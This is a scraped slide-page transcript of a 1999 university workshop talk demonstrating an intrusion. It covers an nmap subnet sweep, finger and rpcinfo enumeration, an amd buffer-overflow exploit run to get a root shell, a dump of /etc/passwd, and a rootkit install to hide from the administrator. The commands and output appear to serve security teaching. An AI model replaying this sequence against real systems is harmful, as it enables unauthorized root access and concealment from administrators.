Taeho Oh/PLUS 3rd CONCERT Workshop Nov. 1999 Intrusion demonstration Part I Postech PLUS Taeho Oh (PLUS015)

Slides:



Advertisements
Similar presentations
Backdoors A backdoor is a program that allows attackers to bypass normal security controls on a system, gaining access on the attacker’s own terms.
Advertisements

Network Mapping  Identify Live Hosts  Determine running Services TCP Port Scanning UDP Port Scanning Banner Grabbing ARP Discovery  Identify Perimeter.
Nmap Experiment.
Scanning CS391. Overview  The TCP protocol: quick overview  Scanning  Fingerprinting  OS Detection.
IP Network Scanning.
CIT 380: Securing Computer SystemsSlide #1 CIT 380: Securing Computer Systems Scanning.
Hacking Case Study Sungchul Hong. Acme Art, Inc. Case October 31, A hacker stole credit card numbers from the online store’s database.
Hacking Linux Based on Hacking Linux Exposed Hatch, Lee, and Kurtz ISBN
Intruder Trends Tom Longstaff CERT Coordination Center Software Engineering Institute Carnegie Mellon University Pittsburgh, PA Sponsored by.
The Transport Layer Chapter 6. The Transport Service Services Provided to the Upper Layers Transport Service Primitives Berkeley Sockets An Example of.
Port Scanning Yiqian Zhang CS 265 Project. What is Port Scanning? port scanning is equivalent to knocking on the walls to find all the doors and windows.
Information Networking Security and Assurance Lab National Chung Cheng University 1 A Real World Attack: wu-ftp.
Information Networking Security and Assurance Lab National Chung Cheng University 2004/03/031 A Real World Attack: wu-ftp Cao er kai ( 曹爾凱 )
Computer Security and Penetration Testing
Attack Profiles CS-480b Dick Steflik Attack Categories Denial-of-Service Exploitation Attacks Information Gathering Attacks Disinformation Attacks.
Log Analysis and Intrusion Detection By Srikrishna Gudavalli Venkata Naga Vamsi Krishna Ravi Kiran Yellepeddy.
Hacking Unix/Linux.
Network Security With nmap By *** *****. Installing nmap netlab-2# cd /usr/ports/security/nmap netlab-2# make install all.
IST 228\Ch3\IP Addressing1 TCP/IP and DoD Model (TCP/IP Model)
Ana Chanaba Robert Huylo
Data Gathering A hacker can’t do anything to you if they don’t know anything about you. The hacker requires: –A target –Your ip address –Your OS type –What.
1 Reconnaissance, Network Mapping, and Vulnerability Assessment ECE4112 – Internetwork Security Georgia Institute of Technology.
Mid 1960 ’ s - Multics - proposed by AT&T, Honeywell, GE & MIT; funded by DARPA Thompson & Ritchie create Unix 1978 to 84 - Bill Joy & Chuck Haley.
Kirby Kuehl Honeynet Project Member 05/08/2002 Intrusion Deception.
Port Scanning 0x470~0x480 Presenter SangDuk Seo 1.
CIT 380: Securing Computer SystemsSlide #1 CIT 380: Securing Computer Systems Scanning.
ECE4112 Lab 7: Honeypots and Network Monitoring and Forensics Group 13 + Group 14 Allen Brewer Jiayue (Simon) Chen Daniel Chu Chinmay Patel.
Honeypot and Intrusion Detection System
OS Hardening Justin Whitehead Francisco Robles. ECE Internetwork Security OS Hardening Installing kernel/software patches and configuring a system.
Attack Lifecycle Many attacks against information systems follow a standard lifecycle: –Stage 1: Info. gathering (reconnaissance) –Stage 2: Penetration.
File Permissions. What are the three categories of users that apply to file permissions? Owner (or user) Group All others (public, world, others)
CIS 450 – Network Security Chapter 3 – Information Gathering.
COEN 350 Security Threats. Network Based Exploits Phases of an Attack  Reconnaissance  Scanning  Gaining Access  Expanding Access  Covering Tracks.
ITI-481: Unix Administration Meeting 3. Today’s Agenda Hands-on exercises with booting and software installation. Account Management Basic Network Configuration.
Port Scanning. Introduction Port scanning –techniques that attackers use to discover services they can break into. Idea –sending a message to each port,
LINUX Tuesday, 5 July :00 pm. Remote Login l Use Secure Shell (ssh) l Machine name/IP address E.g. ssh hydra.sma.nus.edu.sg Or ssh
1 CHAPTER 3 CLASSES OF ATTACK. 2 Denial of Service (DoS) Takes place when availability to resource is intentionally blocked or degraded Takes place when.
Пример атаки. WHOIS Search ACMETRADE.COM Registrant: Acmetrade.com, Inc. (ACMETRADE-DOM) 6600 Peachtree Dunwoody Road Atlanta, GA Domain Name:
Port Scanning and Enumeration (NMAP)
1 Reconnaissance, Network Mapping, and Vulnerability Assessment ECE4112 – Internetwork Security Georgia Institute of Technology.
1 Reconnaissance, Network Mapping, and Vulnerability Assessment ECE4112 – Internetwork Security Georgia Institute of Technology.
Linux Networking and Security
Linux security Taeho Oh
Chapter 2 Scanning Last modified Determining If The System Is Alive.
Distributed Denial of Service Attacks Shankar Saxena Veer Vivek Kaushik.
1 Figure 4-1: Targeted System Penetration (Break-In Attacks) Host Scanning  Ping often is blocked by firewalls  Send TCP SYN/ACK to generate RST segments.
Cracking Techniques Onno W. Purbo
Topics Network topology Virtual LAN Port scanners and utilities Packet sniffers Weak protocols Practical exercise.
UPnP Buffer Overflow Demo This is a True Story …of what could happen.
Unix network Services. Configuring a network interface In Unix there are essentially two commands that are used to enable TCP/IP. ifconfig route.
17 Establishing Dial-up Connection to the Internet Using Windows 9x 1.Install and configure the modem 2.Configure Dial-Up Adapter 3.Configure Dial-Up Networking.
TCP/IP Protocol Suite ©Richard L. Goldman September 25, 2002.
Network and Port Scanning Chien-Chung Shen
Security Script Kiddies Network Security Port Scans.
Common System Exploits Tom Chothia Computer Security, Lecture 17.
UNIX Introduction History Main Features UNIX Operating System
Two FTP connections from different hosts
Onno W. Purbo Cracking Techniques Onno W. Purbo
Port Scanning (based on nmap tool)
Hacking Unix/Linux.
Hasil Scan Situs Internet Bank
Metasploit a one-stop hack shop
Security Scan melalui Internet
CIT 480: Securing Computer Systems
Introduction to GNU/Linux (Fedora) Command Line Interface
Information Gathering
Lab 1 introduction, debrief
Working at a Small-to-Medium Business or ISP – Chapter 7
Metasploit Analysis Report Overview
Computer Networks Protocols
Presentation transcript:

Taeho Oh/PLUS 3rd CONCERT Workshop Nov Intrusion demonstration Part I Postech PLUS Taeho Oh (PLUS015)

Taeho Oh/PLUS 3rd CONCERT Workshop Nov Contents Scan wide area network –Using powerful network scanner, nmap –Find the running hosts in the network –Gather the host information Get root permission from the target host Hide himself from the admin

Taeho Oh/PLUS 3rd CONCERT Workshop Nov Scan wide area network (1) Using powerful network scanner, nmap –nmap can do ftp bounce scan, stealth scan, OS prediction, and so on. –

Taeho Oh/PLUS 3rd CONCERT Workshop Nov Scan wide area network (2) Find the running hosts in the network [ ~ ] {1} # nmap -sP " xxx.*" Host ( xxx.0) appears to be up. Host ( xxx.0) seems to be a subnet broadcast address (returned 111 extra pings). Skipping host. Host kwxnxoo.postech.ac.kr ( xxx.7) appears to be up. Host xojx.postech.ac.kr ( xxx.9) appears to be up. (... ) Host victim.postech.ac.kr ( xxx.75) appears to be up. Host xstxos.postech.ac.kr ( xxx.77) appears to be up. Host anxelx.postech.ac.kr ( xxx.78) appears to be up. Host mxrlxns.postech.ac.kr ( xxx.79) appears to be up. Host ( xxx.99) appears to be up. Host ( xxx.255) appears to be up. Host ( xxx.255) seems to be a subnet broadcast address (returned 93 extra pings). Skipping host. Nmap run completed IP addresses (27 hosts up) scanned in 2 seconds

Taeho Oh/PLUS 3rd CONCERT Workshop Nov Scan wide area network (3) Gather the host information [ ~ ] {2} # nmap -I -O Interesting ports on victim.postech.ac.kr ( xxx.75): Port State Protocol Service Owner 21 open tcp ftp root 23 open tcp telnet root 25 open tcp smtp root 53 open tcp domain root 79 open tcp finger root 80 open tcp http nobody (... ) 6000 open tcp X11 root TCP Sequence Prediction: Class=random positive increments Difficulty= (Good luck!) Remote operating system guess: Linux ; pre Nmap run completed -- 1 IP address (1 host up) scanned in 19 seconds

Taeho Oh/PLUS 3rd CONCERT Workshop Nov Scan wide area network (4) Gather the host information [ ~ ] {3} # [ xxx.75] Login Name Tty Idle Login Time Office Office Phone kotaeji Kim Taehyung /0 20:46 Oct 27 19:41 [ ~ ] {4} # rpcinfo -p xxx.75 program vers proto port tcp 111 rpcbind udp 111 rpcbind (... ) udp 1026 nlockmgr udp 1026 nlockmgr tcp 1024 nlockmgr tcp 1024 nlockmgr tcp 878 amd udp 879 amd

Taeho Oh/PLUS 3rd CONCERT Workshop Nov Get root permission from the target host Get root with amd buffer overflow exploit [ ~ ] {5} #./amd-ex xxx.75 Attack xxx.75 amq: could not start new autmount point: Connection timed out Connect to the shell Linux victim #1 Wed Jun 2 09:17:03 EDT 1999 i686 unknown uid=0(root) gid=0(root) id uid=0(root) gid=0(root) cat /etc/passwd root:x:0:0:root:/root:/bin/bash bin:x:1:1:bin:/bin: daemon:x:2:2:daemon:/sbin: adm:x:3:4:adm:/var/adm: lp:x:4:7:lp:/var/spool/lpd: sync:x:5:0:sync:/sbin:/bin/sync shutdown:x:6:0:shutdown:/sbin:/sbin/shutdown (... )

Taeho Oh/PLUS 3rd CONCERT Workshop Nov Hide himself from the admin Install rootkit Trojan files of ohhara rootkit –chgrp, chmod, chown, cp, ln, ls, mkdir, mknod, netstat, ps, touch, dir, du, find, mkfifo, oldps, top, vdir, fixdate, in.inetd, in.smbd, in.telnetd, pam.pwdb.so [ ~ ] {1} # tar -xzf ohhara-rootkit.tar.gz [ ~ ] {2} # cd ohhara-rootkit [ ~/ohhara-rootkit ] {3} #./install-ohhara-rootkit